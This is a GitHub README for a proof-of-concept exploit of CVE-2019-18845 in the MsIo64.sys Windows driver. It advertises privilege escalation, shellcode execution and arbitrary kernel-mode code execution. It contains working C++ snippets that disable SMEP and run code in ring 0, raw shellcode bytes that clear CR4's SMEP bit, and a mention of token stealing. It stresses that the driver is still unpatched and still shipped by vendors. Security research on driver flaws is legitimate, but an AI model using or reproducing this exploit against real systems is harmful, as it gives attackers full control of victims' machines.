Awesome
<p align="center"> <img src="image.gif"> </p> <p align="center"> <img src="https://img.shields.io/github/workflow/status/kkent030315/MsIoExploit/MSBuild?style=for-the-badge"> <img src="https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge"> <img src="https://img.shields.io/codacy/grade/80af226b06214213bc3d2a44c9624222?style=for-the-badge"> <img src="https://img.shields.io/github/license/kkent030315/MsIoExploit?style=for-the-badge"> </p>MsIoExploit
Exploit MsIo vulnerable driver
Description
This is a PoC for CVE-2019-18845 MsIo64.sys
allowing non-privileged user to map/unmap arbitrary physical memory via ZwMapViewOfSection
/ ZwUnmapViweOfSection
.
If you are interested in abusing physical memory mapping, see project anycall has full implementation of client and driver-sided functionalities.
Allowing non-privileged(non-kernel) component to map arbitrary physical memory is the most bad practice and critically vulnerable way which allowing attacker to gain full control of the system as I demonstrated arbitrary NT-Kernel API invocation in this PoC.
You can try by yourself by executing this while you have driver running.
Also this driver and MsIo64.dll
are fully copy & paste of IO-Memory.
This exploit was first reported 2019 but still remains unfixed and hardware vendors like ASRock still use this driver.
Features
- Privilege Escalation
- Shellcode Execution
- Arbitrary code execution in CPL0 context
__writemsr
,__cpuid
or whatever
I've implemented a replicate of Capcom exploit so you can execute any code in CPL0 context, as follows:
unsigned long long cr4 = 0;
static auto ntoskrnl_image_base = this->ntoskrnl_image_base;
static uint16_t dos_signature = 0x0;
this->disable_smep(&cr4);
// lambda will be called in the CPL0
this->exec_in_kernel([]() -> void
{
// direct access to the kernel virtual memory
dos_signature = *(uint16_t*)(ntoskrnl_image_base);
});
this->enable_smep(&cr4);
Please note that the lambda function cannot be captured because captured lambda functions cannot be a function pointer. so only static
members can access from inside of the lambda. also in the context of CPL0 it is impossible to call a few specific functions like printf
will cause BSOD of course.
Shellcode execution will be look like:
void exploit::disable_smep(unsigned long long* old_cr4)
{
static uint8_t disable_smep_shellcode[] = {
0xFA, // cli
0x0F, 0x20, 0xE0, // mov rax, cr4
0x48, 0x89, 0x01, // mov QWORD PTR [rcx], rax
0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff
0x0F, 0x22, 0xE0, // mov cr4, rax
0xC3 }; // ret
this->execute_shellcode_in_kernel<fn_disable_smep_t>(
reinterpret_cast<uint8_t*>(&disable_smep_shellcode),
sizeof(disable_smep_shellcode),
old_cr4);
}
Now we have a full control out of the system, no need to do dumbass thing like mapping unsigned drivers.
Usage
> MsIoExploit.exe
Credit
Several sources regarding token steal are from ExploitCapcom
Credit @tandasat
License
MIT copyright Kento Oki <hrn832@protonmail.com>